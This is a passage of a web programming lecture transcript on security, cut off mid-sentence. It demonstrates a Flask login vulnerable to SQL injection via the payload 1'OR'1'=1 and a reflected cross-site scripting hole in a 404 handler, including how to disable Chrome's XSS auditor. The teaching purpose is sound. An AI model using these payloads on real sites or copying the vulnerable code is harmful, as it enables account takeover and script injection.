00:36:09,430 --> 00:36:14,169
this index route, first checks if there
is a username inside of the session.

817
00:36:14,169 --> 00:36:16,460
If there is a user name in
the session, in other words,

818
00:36:16,460 --> 00:36:18,480
if someone is logged into
this current session,

819
00:36:18,480 --> 00:36:21,710
we'll go ahead and render a
user.html page that will just display

820
00:36:21,710 --> 00:36:23,750
who's currently logged in for instance.

821
00:36:23,750 --> 00:36:25,750
Otherwise, if there
is no user, then we're

822
00:36:25,750 --> 00:36:29,380
going to go ahead and render a
login.html page that would give people

823
00:36:29,380 --> 00:36:32,410
the option to log into this website.

824
00:36:32,410 --> 00:36:37,220
And now, let's take a look at what's
happening inside of the login function.

825
00:36:37,220 --> 00:36:42,220
So first thing we're doing is someone
logs in by submitting a post request

826
00:36:42,220 --> 00:36:43,870
to /login.

827
00:36:43,870 --> 00:36:47,170
Then we get the user name by going
request.form.get("username").

828
00:36:47,170 --> 00:36:49,710
We get the password by
request.form.get("password"),

829
00:36:49,710 --> 00:36:51,979
just extracting that
information from the form.

830
00:36:51,979 --> 00:36:53,770
We're going to print
out what the query is.

831
00:36:53,770 --> 00:36:55,670
You'll see an example
of that in a moment,

832
00:36:55,670 --> 00:36:57,220
but this isn't strictly necessary.

833
00:36:57,220 --> 00:36:59,590
The interesting thing
is here, on line 33.

834
00:36:59,590 --> 00:37:03,040
We're running db.execute, running
a database query, and saying,

835
00:37:03,040 --> 00:37:06,340
select star from users
where username equals

836
00:37:06,340 --> 00:37:08,810
and then plugging in the
username here, and password

837
00:37:08,810 --> 00:37:11,560
equals, plugging in the
password there, and then

838
00:37:11,560 --> 00:37:15,070
just getting the first row
that comes back from that.

839
00:37:15,070 --> 00:37:18,100
And if a row does come back from
that, if the query was successful,

840
00:37:18,100 --> 00:37:21,130
then and we log the user in by
storing them inside the session

841
00:37:21,130 --> 00:37:23,840
and redirecting them
back to the index page.

842
00:37:23,840 --> 00:37:27,970
In other words, we render the login
page again, saying invalid=True,

843
00:37:27,970 --> 00:37:30,790
meaning there was some
authentication problem.

844
00:37:30,790 --> 00:37:33,280
So that's all fairly straightforward.

845
00:37:33,280 --> 00:37:35,757
And of course, the key
vulnerability to look at here

846
00:37:35,757 --> 00:37:38,590
is the fact that whatever the
username and whatever the password is,

847
00:37:38,590 --> 00:37:40,900
we just plugged them
straight into the SQL query

848
00:37:40,900 --> 00:37:45,530
by just using string concatenation
in Python to join this all together.

849
00:37:45,530 --> 00:37:53,830
So now if I were to run this Flask
application and take this URL

850
00:37:53,830 --> 00:37:56,890
and go to that URL, I'm
faced with this login form.

851
00:37:56,890 --> 00:37:58,700
And I can type in Alice--

852
00:37:58,700 --> 00:38:01,690
and normally you would
want your password field

853
00:38:01,690 --> 00:38:05,652
to use dots by setting the input type
to be passwords so nobody can see it,

854
00:38:05,652 --> 00:38:08,110
but for the sake of example,
so you can see what I'm doing,

855
00:38:08,110 --> 00:38:10,540
I've changed the password field
to just be a text field so you can

856
00:38:10,540 --> 00:38:12,190
see what password is being typed in.

857
00:38:12,190 --> 00:38:15,240
But of course, you would never
actually want to do that in practice.

858
00:38:15,240 --> 00:38:18,010
But if I type hello as the
password, which is Alice's password,

859
00:38:18,010 --> 00:38:19,980
and click Submit, now
I'm logged in as Alice.

860
00:38:19,980 --> 00:38:21,850
It says, Welcome, alice.

861
00:38:21,850 --> 00:38:23,744
And you can check by looking at the log.

862
00:38:23,744 --> 00:38:24,910
Here's what got printed out.

863
00:38:24,910 --> 00:38:26,170
Here was the query that ran.

864
00:38:26,170 --> 00:38:30,190
Select star from users, where username
equals Alice and password equals hello,

865
00:38:30,190 --> 00:38:32,580
and of course, that returned
back Alice as my one row,

866
00:38:32,580 --> 00:38:34,980
and so that was all good.

867
00:38:34,980 --> 00:38:36,510
I'll log out now.

868
00:38:36,510 --> 00:38:39,790
If I try logging in with Alice
with a fake password, goodbye,

869
00:38:39,790 --> 00:38:41,920
which is not the correct
password, and Submit,

870
00:38:41,920 --> 00:38:44,050
I get Error, invalid credentials.

871
00:38:44,050 --> 00:38:44,565
Why is that?

872
00:38:44,565 --> 00:38:45,940
Well, here is the query that ran.

873
00:38:45,940 --> 00:38:50,620
Select star from users, where user name
is Alice and password equals goodbye.

874
00:38:50,620 --> 00:38:53,160
Well, that's not going
to return any results.

875
00:38:53,160 --> 00:38:56,230
But of course, the injection attack
happens if I type user name Alice,

876
00:38:56,230 --> 00:39:06,157
or user name, any user name that I
want, and type in 1'OR'1'=1, like that,

877
00:39:06,157 --> 00:39:09,240
where now if I submit that, no matter
who the user is, now I see, Welcome,

878
00:39:09,240 --> 00:39:09,740
alice.

879
00:39:09,740 --> 00:39:12,750
I've logged into this user's
account, and why did that happen?

880
00:39:12,750 --> 00:39:14,250
Well, here's the query that was run.

881
00:39:14,250 --> 00:39:19,440
Select star from users where username
equals Alice and password equals 1 or 1

882
00:39:19,440 --> 00:39:20,040
equals 1.

883
00:39:20,040 --> 00:39:23,700
So by injecting arbitrary
SQL logic into this code,

884
00:39:23,700 --> 00:39:26,854
I was able to gain access to any
user account that I wanted to.

885
00:39:26,854 --> 00:39:28,770
And that's why it's very
important, when we're

886
00:39:28,770 --> 00:39:32,640
using SQL and running SQL queries, that
we're careful to avoid SQL injection.

887
00:39:32,640 --> 00:39:35,940
That any time user input
is being put into a query,

888
00:39:35,940 --> 00:39:38,820
we want to escape any
potential characters that

889
00:39:38,820 --> 00:39:42,090
might be part of a SQL
query in order to make sure

890
00:39:42,090 --> 00:39:44,520
that nobody can just
run whatever SQL queries

891
00:39:44,520 --> 00:39:46,710
they want to inside of our code.

892
00:39:46,710 --> 00:39:49,380
And SQLAlchemy, which you may
have been using in Python in order

893
00:39:49,380 --> 00:39:51,720
to do some of this stuff,
automatically takes

894
00:39:51,720 --> 00:39:54,210
care of doing some of
that escaping for you,

895
00:39:54,210 --> 00:39:56,940
if you're passing in the
parameters in a Python dictionary

896
00:39:56,940 --> 00:39:58,980
for instance, which you
might have done before.

897
00:39:58,980 --> 00:40:02,980
And so that's certainly
something you can use as well.

898
00:40:02,980 --> 00:40:05,490
Questions about SQL vulnerabilities?

899
00:40:05,490 --> 00:40:08,910
Whether it was reasons why we might
want to use hashed passwords inside

900
00:40:08,910 --> 00:40:11,655
of our database or how we might
accidentally leak information,

901
00:40:11,655 --> 00:40:15,060
as via that forgot your
password page, or as

902
00:40:15,060 --> 00:40:18,090
to how we might have gone
about using SQL injection

903
00:40:18,090 --> 00:40:20,370
to gain access to unauthorized data.

904
00:40:20,370 --> 00:40:23,730


905
00:40:23,730 --> 00:40:25,250
OK.

906
00:40:25,250 --> 00:40:27,770
Next up, before we take
our break, was about APIs.

907
00:40:27,770 --> 00:40:31,130
So we were thinking about Application
Programming Interfaces, the idea

908
00:40:31,130 --> 00:40:34,670
that people could write APIs
for their web applications

909
00:40:34,670 --> 00:40:39,406
that let people programmatically gain
access to information about whatever it

910
00:40:39,406 --> 00:40:41,030
is that your website is designed to do.

911
00:40:41,030 --> 00:40:42,980
So in the case of book
reviews, maybe you

912
00:40:42,980 --> 00:40:45,962
had an API route that returned
the reviews for a particular book.

913
00:40:45,962 --> 00:40:48,170
But you might imagine that
other sites might give you

914
00:40:48,170 --> 00:40:49,550
API routes that do other things.

915
00:40:49,550 --> 00:40:51,383
We didn't do this for
project three, but you

916
00:40:51,383 --> 00:40:55,160
might imagine that in a restaurant,
for instance, that had a website,

917
00:40:55,160 --> 00:40:58,340
you might have an API route that gives
you back your orders, for instance.

918
00:40:58,340 --> 00:41:01,832
What security considerations
should go into designing APIs?

919
00:41:01,832 --> 00:41:03,290
Or what could potentially go wrong?

920
00:41:03,290 --> 00:41:05,932


921
00:41:05,932 --> 00:41:07,890
Broad questions, so lots
of possibilities here.

922
00:41:07,890 --> 00:41:15,330


923
00:41:15,330 --> 00:41:18,310
AUDIENCE: You can expose stuff
that shouldn't be exposed.

924
00:41:18,310 --> 00:41:20,685
BRIAN YU: You can expose stuff
that shouldn't be exposed.

925
00:41:20,685 --> 00:41:23,140
So that's an interesting
idea, that if I, for instance,

926
00:41:23,140 --> 00:41:27,840
had an API for being able to look at
my Amazon orders or look at the food

927
00:41:27,840 --> 00:41:30,090
that I've ordered from a
restaurant in particular,

928
00:41:30,090 --> 00:41:32,940
I would want that to somehow
only be accessible to me

929
00:41:32,940 --> 00:41:34,810
and not accessible to someone else.

930
00:41:34,810 --> 00:41:38,340
And so how would we implement
this idea of some people

931
00:41:38,340 --> 00:41:41,070
should be able to access
certain information by the API,

932
00:41:41,070 --> 00:41:44,040
and other people should not be
able to access that information

933
00:41:44,040 --> 00:41:49,180
and should only be able to access
some other pieces of information?

934
00:41:49,180 --> 00:41:50,247
AUDIENCE: Authentication.

935
00:41:50,247 --> 00:41:51,580
BRIAN YU: Authentication, great.

936
00:41:51,580 --> 00:41:54,910
We can use what are commonly
known as API keys, which are just

937
00:41:54,910 --> 00:41:57,940
strings of text that are
associated with a particular user,

938
00:41:57,940 --> 00:42:00,460
effectively like a
password, but for APIs.

939
00:42:00,460 --> 00:42:02,472
Such that in order to
make an API request,

940
00:42:02,472 --> 00:42:04,180
you not only need to
submit your request,

941
00:42:04,180 --> 00:42:06,370
but you also need to
submit your API key.

942
00:42:06,370 --> 00:42:09,200
And then it's on the web application
to check that key, to say,

943
00:42:09,200 --> 00:42:13,490
does this key have permission to look at
the things that it's trying to look at?

944
00:42:13,490 --> 00:42:15,370
And this is the idea of
route authentication,

945
00:42:15,370 --> 00:42:17,860
that if someone makes an API
request to a particular route,

946
00:42:17,860 --> 00:42:21,310
you better first make sure that whoever
is making that request has permission

947
00:42:21,310 --> 00:42:24,710
to see whatever they're asking to see
before you actually show it to them.

948
00:42:24,710 --> 00:42:26,890
And so API keys can be
used for that as well.

949
00:42:26,890 --> 00:42:29,200
In addition, they're often
used for rate limiting,

950
00:42:29,200 --> 00:42:32,116
where if you're worried about
someone over using an API

951
00:42:32,116 --> 00:42:34,990
or abusing your server of making
thousands upon thousands of requests

952
00:42:34,990 --> 00:42:37,090
in a short period of
time, you can rate limit

953
00:42:37,090 --> 00:42:40,060
and say, well, I only want
you to be able to make

954
00:42:40,060 --> 00:42:42,440
x number of requests per hour.

955
00:42:42,440 --> 00:42:44,770
And if you have an API
key, then it's pretty easy

956
00:42:44,770 --> 00:42:47,520
to implement this idea of rate
limiting because all you have to do

957
00:42:47,520 --> 00:42:50,410
is keep track inside of a
table somewhere this API key

958
00:42:50,410 --> 00:42:54,220
has used 28 requests in the last hour,
so they're hitting up on their limit.

959
00:42:54,220 --> 00:42:56,320
And so if they use any
more, we should just

960
00:42:56,320 --> 00:42:59,890
stop allowing them to use the API key
until it refreshes for the next hour,

961
00:42:59,890 --> 00:43:00,850
for instance.

962
00:43:00,850 --> 00:43:05,170
And so in your project, you might
not have needed to use an API key,

963
00:43:05,170 --> 00:43:08,500
but anytime you want to deal with
potentially authenticated data

964
00:43:08,500 --> 00:43:11,950
or you want to rate limit, then you'll
want to think about using an API key

965
00:43:11,950 --> 00:43:14,350
like you did have to use
with the good reads API

966
00:43:14,350 --> 00:43:17,110
in order to take advantage
of features like rate

967
00:43:17,110 --> 00:43:19,180
limiting or authenticating
particular routes

968
00:43:19,180 --> 00:43:21,700
to make sure that only
certain users have the ability

969
00:43:21,700 --> 00:43:24,490
to access particular routes.

970
00:43:24,490 --> 00:43:27,350
Questions about that?

971
00:43:27,350 --> 00:43:27,850
All right.

972
00:43:27,850 --> 00:43:30,110
In that case, we'll take a short
break and when we come back,

973
00:43:30,110 --> 00:43:33,160
we'll take a look at JavaScript and look
at the many different kinds of security

974
00:43:33,160 --> 00:43:35,110
vulnerabilities that
come about when we start

975
00:43:35,110 --> 00:43:39,057
introducing JavaScript and client-side
code into our web applications.

976
00:43:39,057 --> 00:43:41,860


977
00:43:41,860 --> 00:43:42,760
Welcome back.

978
00:43:42,760 --> 00:43:45,370
So we're at about the
midway point in the course,

979
00:43:45,370 --> 00:43:47,320
and then we started to
talk about JavaScript.

980
00:43:47,320 --> 00:43:49,690
And so JavaScript, if you
recall, was the language

981
00:43:49,690 --> 00:43:51,537
that we were using in
order to write code

982
00:43:51,537 --> 00:43:54,370
on the client side, code that was
actually running inside the user's

983
00:43:54,370 --> 00:43:57,640
browser and not on the server
where Flask or Django was running,

984
00:43:57,640 --> 00:43:58,540
for instance.

985
00:43:58,540 --> 00:44:02,272
And this leads to a whole new host of
potential security vulnerabilities.

986
00:44:02,272 --> 00:44:03,730
So let's start to chat about these.

987
00:44:03,730 --> 00:44:05,377
What could go wrong?

988
00:44:05,377 --> 00:44:07,210
What sorts of exploits
could happen, can you

989
00:44:07,210 --> 00:44:10,830
think of, when we start to introduce
JavaScript into the equation?

990
00:44:10,830 --> 00:44:13,350
Code that can run inside
the user's browser.

991
00:44:13,350 --> 00:44:14,514
Yeah?

992
00:44:14,514 --> 00:44:18,820
AUDIENCE: When we [INAUDIBLE]
information, [INAUDIBLE] even that it

993
00:44:18,820 --> 00:44:19,981
can change.

994
00:44:19,981 --> 00:44:28,430
Like someone's address [INAUDIBLE]
that changing someone's

995
00:44:28,430 --> 00:44:33,484
address to someone else and
using JavaScript [INAUDIBLE]..

996
00:44:33,484 --> 00:44:34,150
BRIAN YU: Great.

997
00:44:34,150 --> 00:44:36,760
So JavaScript has all these event
handlers that we've talked about,

998
00:44:36,760 --> 00:44:39,130
whether on load or on click,
that can do various things.

999
00:44:39,130 --> 00:44:41,837
And potentially, if someone
clicks on something in code that

1000
00:44:41,837 --> 00:44:43,670
does something malicious
that's able to run,

1001
00:44:43,670 --> 00:44:45,670
it can make something
potentially bad happen.

1002
00:44:45,670 --> 00:44:48,610
And we'll take a look at at least
one example of that definitely

1003
00:44:48,610 --> 00:44:50,286
later on today.

1004
00:44:50,286 --> 00:44:52,160
Other things that could
potentially go wrong?

1005
00:44:52,160 --> 00:44:54,618
There are a lot of potential
security vulnerabilities here.

1006
00:44:54,618 --> 00:44:56,210
So let's just toss out some ideas.

1007
00:44:56,210 --> 00:45:00,642


1008
00:45:00,642 --> 00:45:02,350
What would we want to
avoid happening now

1009
00:45:02,350 --> 00:45:05,110
that we have JavaScript code
that can run inside the browser?

1010
00:45:05,110 --> 00:45:09,022


1011
00:45:09,022 --> 00:45:15,974
AUDIENCE: Someone might redirect from
the site you're on to another site.

1012
00:45:15,974 --> 00:45:16,640
BRIAN YU: Great.

1013
00:45:16,640 --> 00:45:18,620
Certainly, someone might try
and redirect from the site

1014
00:45:18,620 --> 00:45:19,828
you're on to some other site.

1015
00:45:19,828 --> 00:45:22,850
That we've looked at ways that
we can use JavaScript in order

1016
00:45:22,850 --> 00:45:25,170
to redirect someone from
one place to another.

1017
00:45:25,170 --> 00:45:27,800
And if we're not careful,
that JavaScript code

1018
00:45:27,800 --> 00:45:30,860
might be able to redirect the user
to someplace that the user doesn't

1019
00:45:30,860 --> 00:45:32,090
necessarily want to be.

1020
00:45:32,090 --> 00:45:35,760
And so we'll definitely look at
an example of that later on, too.

1021
00:45:35,760 --> 00:45:37,870
So that's definitely one
potential vulnerability.

1022
00:45:37,870 --> 00:45:38,370
Yeah?

1023
00:45:38,370 --> 00:45:41,529
AUDIENCE: So like with HTML and
CSS, it was all static, just

1024
00:45:41,529 --> 00:45:42,656
like what a user sees.

1025
00:45:42,656 --> 00:45:44,364
But with JavaScript,
you can actually use

1026
00:45:44,364 --> 00:45:46,632
it to run code on someone's machine.

1027
00:45:46,632 --> 00:45:51,980
So if you write a malicious code, you
can [INAUDIBLE] someone's computer.

1028
00:45:51,980 --> 00:45:52,730
BRIAN YU: Exactly.

1029
00:45:52,730 --> 00:45:55,700
So with HTML and CSS,
we didn't really need

1030
00:45:55,700 --> 00:45:58,490
to have to worry about code
actually running for the most part

1031
00:45:58,490 --> 00:46:00,770
because it was just here's
the way that things look.

1032
00:46:00,770 --> 00:46:03,767
And certainly we were able to
use that to try and trick users

1033
00:46:03,767 --> 00:46:06,350
by creating a link that looked
like it went to Bank of America

1034
00:46:06,350 --> 00:46:09,030
but actually went to my
version of some different site.

1035
00:46:09,030 --> 00:46:11,540
But when it comes to
JavaScript, now we really

1036
00:46:11,540 --> 00:46:16,130
have the potential for malicious code
to be running on the user's web browser.

1037
00:46:16,130 --> 00:46:18,950
And so how does that code get
to the user's web browser?

1038
00:46:18,950 --> 00:46:24,500
How does malicious code enter into
some other seemingly benign site,

1039
00:46:24,500 --> 00:46:27,322
and why might those
be potential exploits?

1040
00:46:27,322 --> 00:46:30,530
So where we'll start is by looking at
one potential JavaScript exploit, which

1041
00:46:30,530 --> 00:46:33,240
is quite common, called
cross-site scripting.

1042
00:46:33,240 --> 00:46:35,450
Where the idea of
cross-site scripting is

1043
00:46:35,450 --> 00:46:38,300
that we're going to try and
look for a vulnerability

1044
00:46:38,300 --> 00:46:41,220
where we can-- in the same
way that in the SQL case,

1045
00:46:41,220 --> 00:46:45,890
we were able to inject whatever SQL code
we wanted into being run on a database,

1046
00:46:45,890 --> 00:46:49,355
a malicious user, if they are able to
send the right link to the right person

1047
00:46:49,355 --> 00:46:51,230
and get them to click
on a link for instance,

1048
00:46:51,230 --> 00:46:55,820
are able to get some arbitrary
JavaScript code to run inside

1049
00:46:55,820 --> 00:46:57,700
of the user's web browser.

1050
00:46:57,700 --> 00:47:00,952
And so let's take a look at a
very simple Flask application.

1051
00:47:00,952 --> 00:47:03,410
This is in fact, the entire
Flask application, the contents

1052
00:47:03,410 --> 00:47:05,930
of application.py, for example.

1053
00:47:05,930 --> 00:47:09,254
And there is in fact, a
major cross-site scripting

1054
00:47:09,254 --> 00:47:11,420
vulnerability inside this
application, and see if we

1055
00:47:11,420 --> 00:47:13,320
can tease apart where exactly that is.

1056
00:47:13,320 --> 00:47:16,010
So at the beginning, we import
Flask, and we import request,

1057
00:47:16,010 --> 00:47:17,780
which we'll need access to later.

1058
00:47:17,780 --> 00:47:22,430
We create a new Flask application
inside the current module.

1059
00:47:22,430 --> 00:47:25,880
Then we define a default route,
just when you go to the slash route.

1060
00:47:25,880 --> 00:47:29,120
It calls this index function
that returns Hello, world.

1061
00:47:29,120 --> 00:47:32,420
And then down here, we
have app.errorhandler(404).

1062
00:47:32,420 --> 00:47:34,640
So you may not have seen
this before, but Flask

1063
00:47:34,640 --> 00:47:37,340
has built in error handlers
that are specific functions that

1064
00:47:37,340 --> 00:47:39,590
run when specific error codes happen.

1065
00:47:39,590 --> 00:47:41,930
So 404, you might
recall, is the error code

1066
00:47:41,930 --> 00:47:44,210
for not found when someone
goes to a page that

1067
00:47:44,210 --> 00:47:45,920
doesn't exist on the web server.

1068
00:47:45,920 --> 00:47:50,390
And what Flask can do for you is say
whenever a 404 error happens on the web

1069
00:47:50,390 --> 00:47:54,230
server, go ahead and run this function,
which is going to supposedly render

1070
00:47:54,230 --> 00:47:55,650
my 404 error page.

1071
00:47:55,650 --> 00:47:57,870
And you can do the same
thing for error 500,

1072
00:47:57,870 --> 00:48:00,940
for example, internal server
errors, or 403, forbidden errors,

1073
00:48:00,940 --> 00:48:02,806
or any other errors
status code you want.

1074
00:48:02,806 --> 00:48:05,180
If you want particular code
to run, a particular template

1075
00:48:05,180 --> 00:48:09,470
to be displayed when a particular error
code happens on your web application,

1076
00:48:09,470 --> 00:48:12,320
you can use a Flask's
built in error handler

1077
00:48:12,320 --> 00:48:15,450
to be able to handle those
particular situations.

1078
00:48:15,450 --> 00:48:18,650
So what we have here is a function
that is supposed to handle 404 errors,

1079
00:48:18,650 --> 00:48:20,540
that handles a page not found error.

1080
00:48:20,540 --> 00:48:23,390
It calls this page not found
function, and all the page not

1081
00:48:23,390 --> 00:48:26,670
found function is going to
do is say return not found.

1082
00:48:26,670 --> 00:48:30,080
And then it's going to append
request.path, where request.path

1083
00:48:30,080 --> 00:48:32,930
is what the URL was that
the user tried to go

1084
00:48:32,930 --> 00:48:35,900
to that resulted in the 404 error.

1085
00:48:35,900 --> 00:48:38,070
And so what might that mean?

1086
00:48:38,070 --> 00:48:41,090
It means that if a user
goes to /foo, for example,

1087
00:48:41,090 --> 00:48:43,150
then what's going to happen is--

1088
00:48:43,150 --> 00:48:50,591
I'll go ahead and go into
cross-site scripting zero

1089
00:48:50,591 --> 00:48:52,340
and go ahead and run
this web application,

1090
00:48:52,340 --> 00:48:53,652
running that very same code.

1091
00:48:53,652 --> 00:48:55,860
So I get hello, world when
I go to the default route,

1092
00:48:55,860 --> 00:48:58,110
don't type in anything after the URL.

1093
00:48:58,110 --> 00:49:02,276
But if I go to /foo for example,
what do I expect to see?

1094
00:49:02,276 --> 00:49:03,374
AUDIENCE: Error not found.

1095
00:49:03,374 --> 00:49:04,040
BRIAN YU: Great.

1096
00:49:04,040 --> 00:49:08,300
Not Found: foo, because not found
was the initial message that

1097
00:49:08,300 --> 00:49:10,340
happens when I do a 404 error message.

1098
00:49:10,340 --> 00:49:14,180
And then /foo is the path, the
request path that I tried to request.

1099
00:49:14,180 --> 00:49:15,680
And so this might be pretty typical.

1100
00:49:15,680 --> 00:49:17,690
That if I go to a URL
that doesn't exist,

1101
00:49:17,690 --> 00:49:20,510
I probably expect a page like
this to show up that says, sorry,

1102
00:49:20,510 --> 00:49:22,760
this route, this path that
you were trying to request,

1103
00:49:22,760 --> 00:49:25,650
couldn't be found on the web server.

1104
00:49:25,650 --> 00:49:27,750
So what can go wrong there?

1105
00:49:27,750 --> 00:49:31,660
Here's the web application,
where's the security vulnerability?

1106
00:49:31,660 --> 00:49:32,160
Yeah?

1107
00:49:32,160 --> 00:49:37,050
AUDIENCE: So someone maybe could
somehow inject a script path

1108
00:49:37,050 --> 00:49:42,269
into your request path location.

1109
00:49:42,269 --> 00:49:43,310
BRIAN YU: Great, exactly.

1110
00:49:43,310 --> 00:49:45,920
So the vulnerability is
with this request path.

1111
00:49:45,920 --> 00:49:51,260
That if someone is able to inject
JavaScript code into this request

1112
00:49:51,260 --> 00:49:54,530
path, now suddenly, the
thing that I'm returning

1113
00:49:54,530 --> 00:49:57,650
is not found colon,
potentially some JavaScript

1114
00:49:57,650 --> 00:49:59,180
code that is then going to be run.

1115
00:49:59,180 --> 00:50:02,750
And you might imagine that if a hacker
now is able to take one of these URLs

1116
00:50:02,750 --> 00:50:06,370
and convince a user to click on a link
that takes them to a URL like that,

1117
00:50:06,370 --> 00:50:10,280
that takes them to this particular
function in my Flask application, now

1118
00:50:10,280 --> 00:50:13,370
suddenly this hacker is able to
run whatever JavaScript code they

1119
00:50:13,370 --> 00:50:15,980
want to inside of the web application.

1120
00:50:15,980 --> 00:50:17,340
So what might that look like?

1121
00:50:17,340 --> 00:50:22,030
Instead of just going to /foo as the
route that returns a benign not found

1122
00:50:22,030 --> 00:50:30,020
/foo on the page, what if, for instance,
the user typed in this as their URL?

1123
00:50:30,020 --> 00:50:36,320
Where after the slash, they type script
alert hi /script, end JavaScript.

1124
00:50:36,320 --> 00:50:39,170
Now this is going to be
the request path, which

1125
00:50:39,170 --> 00:50:42,290
means what gets put into
return not found colon,

1126
00:50:42,290 --> 00:50:44,270
we're going to return
some page that says not

1127
00:50:44,270 --> 00:50:46,700
found and then this JavaScript code.

1128
00:50:46,700 --> 00:50:51,400
This JavaScript code
that says alert, hi.

1129
00:50:51,400 --> 00:50:53,570
So this is code now that
if someone clicks on,

1130
00:50:53,570 --> 00:50:56,532
might potentially be
executed by this web browser,

1131
00:50:56,532 --> 00:50:57,990
an example of cross-site scripting.

1132
00:50:57,990 --> 00:51:00,290
That someone is able
to send me this link,

1133
00:51:00,290 --> 00:51:03,290
and they were able to inject random
JavaScript, whatever they want,

1134
00:51:03,290 --> 00:51:05,550
into this particular application.

1135
00:51:05,550 --> 00:51:07,620
So let's try it.

1136
00:51:07,620 --> 00:51:10,220
So again, going to /foo,
says Not Found, foo.

1137
00:51:10,220 --> 00:51:13,790
If I do a /bar, it says Not Found bar.

1138
00:51:13,790 --> 00:51:20,780
What's going to happen if I
do script alert hi /script?

1139
00:51:20,780 --> 00:51:23,270
So here's my URL now.

1140
00:51:23,270 --> 00:51:28,220
Rather than type in foo or bar,
I've added to this JavaScript code

1141
00:51:28,220 --> 00:51:30,470
to the URL and I'm going
to try and run that.

1142
00:51:30,470 --> 00:51:32,363
What's going to happen?

1143
00:51:32,363 --> 00:51:34,112
AUDIENCE: An alert.

1144
00:51:34,112 --> 00:51:35,070
AUDIENCE: Get an alert.

1145
00:51:35,070 --> 00:51:35,790
BRIAN YU: We'll get an alert.

1146
00:51:35,790 --> 00:51:37,710
That's what we expect
to happen, at least.

1147
00:51:37,710 --> 00:51:40,680
In fact, Chrome is getting
pretty good at this.

1148
00:51:40,680 --> 00:51:43,380
Chrome and other web browsers
have built-in security features.

1149
00:51:43,380 --> 00:51:44,760
So Chrome actually stopped me.

1150
00:51:44,760 --> 00:51:47,700
It gave me this page that
says, this page isn't working.

1151
00:51:47,700 --> 00:51:49,800
Chrome detected unusual
code on this page

1152
00:51:49,800 --> 00:51:52,020
and blocked it to protect
your personal information,

1153
00:51:52,020 --> 00:51:54,353
for example, passwords, phone
numbers, and credit cards.

1154
00:51:54,353 --> 00:51:57,930
And if we look down here, it
says error, blocked by XSS,

1155
00:51:57,930 --> 00:52:01,980
or cross-site scripting, error blocked
by cross-site scripting auditor.

1156
00:52:01,980 --> 00:52:03,900
So Chrome's got some
built-in feature here

1157
00:52:03,900 --> 00:52:06,150
that's checking for potential
cross-site scripting,

1158
00:52:06,150 --> 00:52:08,400
like what we just tried to
do, and it's blocking me

1159
00:52:08,400 --> 00:52:09,924
from getting access to this page.

1160
00:52:09,924 --> 00:52:12,840
And this defends against certainly
some kinds of cross-site scripting,

1161
00:52:12,840 --> 00:52:13,560
but not all.

1162
00:52:13,560 --> 00:52:17,610
And we'll see an example of one which
bypasses Chrome in just a moment.

1163
00:52:17,610 --> 00:52:19,710
And certainly you can't
rely on all web browsers

1164
00:52:19,710 --> 00:52:22,860
to be able to have this built-in
cross-site scripting auditor built in,

1165
00:52:22,860 --> 00:52:25,800
so these are definitely still
things to be careful about.

1166
00:52:25,800 --> 00:52:29,070
So what would happen if this auditor
didn't exist, if it wasn't in place?

1167
00:52:29,070 --> 00:52:30,420
We can actually find out.

1168
00:52:30,420 --> 00:52:33,780
That Chrome actually lets us, if
I run Chrome from the command line

1169
00:52:33,780 --> 00:52:38,640
and run Chrome dash,
dash, disable xss auditor,

1170
00:52:38,640 --> 00:52:41,640
I can run Chrome without running
the cross-site scripting auditor.

1171
00:52:41,640 --> 00:52:43,230
Just turn that auditor off.

1172
00:52:43,230 --> 00:52:47,970
And now if I go here, slash script
alert high, just like I did before,

1173
00:52:47,970 --> 00:52:51,810
and press Return, now I
get the alert that says hi.

1174
00:52:51,810 --> 00:52:54,390
I've injected JavaScript
code into this page,

1175
00:52:54,390 --> 00:52:57,300
and after I press OK, now
it says not found, slash.

1176
00:52:57,300 --> 00:53:00,270
And of course that
seemed relatively benign,

1177
00:53:00,270 --> 00:53:02,040
that an alert certainly showed up.

1178
00:53:02,040 --> 00:53:05,010
JavaScript code was running, but
nothing was really compromised.

1179
00:53:05,010 --> 00:53:06,900
So where might this go wrong?

1180
00:53:06,900 --> 00:53:09,150
Where could this really
become a problem?

1181
00:53:09,150 --> 00:53:14,170
Can anyone think of why this might
really start to become an issue?

1182
00:53:14,170 --> 00:53:15,670
Injecting arbitrary JavaScript code.

1183
00:53:15,670 --> 00:53:15,900
Yeah?

1184
00:53:15,900 --> 00:53:17,960
AUDIENCE: An executable
could be put in there.

1185
00:53:17,960 --> 00:53:18,626
BRIAN YU: Great.

1186
00:53:18,626 --> 00:53:21,480
Any executable thing could be
put into this JavaScript code

1187
00:53:21,480 --> 00:53:23,070
so that any code could run.

1188
00:53:23,070 --> 00:53:26,070
And in particular, that
means that anything

1189
00:53:26,070 --> 00:53:29,160
could happen on the web
browser, including potentially

1190
00:53:29,160 --> 00:53:31,650
secure information being exposed.

1191
00:53:31,650 --> 00:53:36,036
And so in the case of Flask and
when we talked about logging

1192
00:53:36,036 --> 00:53:38,410
in and logging out, we've
talked about this a little bit,

1193
00:53:38,410 --> 00:53:40,650
how does the browser know--

1194
00:53:40,650 --> 00:53:44,100
or when the server is-- when
someone logs into a website

1195
00:53:44,100 --> 00:53:46,290
and the server says, OK,
this user is now logged in.

1196
00:53:46,290 --> 00:53:49,331
When I go and click on another button,
how does the browser or the server

1197
00:53:49,331 --> 00:53:51,830
still know that I'm the one
logged into the website?

1198
00:53:51,830 --> 00:53:52,770
AUDIENCE: Session.

1199
00:53:52,770 --> 00:53:54,145
BRIAN YU: The session, certainly.

1200
00:53:54,145 --> 00:53:55,075
And how does that--

1201
00:53:55,075 --> 00:53:58,741
or what do we know from the--
what's happening on the client side?

1202
00:53:58,741 --> 00:54:00,990
How does it know that it's
coming from the same place?

1203
00:54:00,990 --> 00:54:03,450
That it's the same user
that's making that request?

1204
00:54:03,450 --> 00:54:04,650
AUDIENCE: It's in a cookie.

1205
00:54:04,650 --> 00:54:06,066
BRIAN YU: Inside of a cookie, yes.

1206
00:54:06,066 --> 00:54:09,364
So that we've got some cookie, some
information, stored in our computer.

1207
00:54:09,364 --> 00:54:12,280
That is the cookie that tells the
server-- it's like a hand stamp that

1208
00:54:12,280 --> 00:54:13,236
says, yes, this is me.

1209
00:54:13,236 --> 00:54:15,360
Show me the same page that
I was looking at before.

1210
00:54:15,360 --> 00:54:16,550
I'm still logged in.

1211
00:54:16,550 --> 00:54:19,696
And we talked about if someone were
ever to get access to that cookie,

1212
00:54:19,696 --> 00:54:21,320
then they would be able to login as us.

1213
00:54:21,320 --> 00:54:24,060
They could pretend to be us and
therefore use our credentials,

1214
00:54:24,060 --> 00:54:26,310
and the server wouldn't be
able to tell the difference

1215
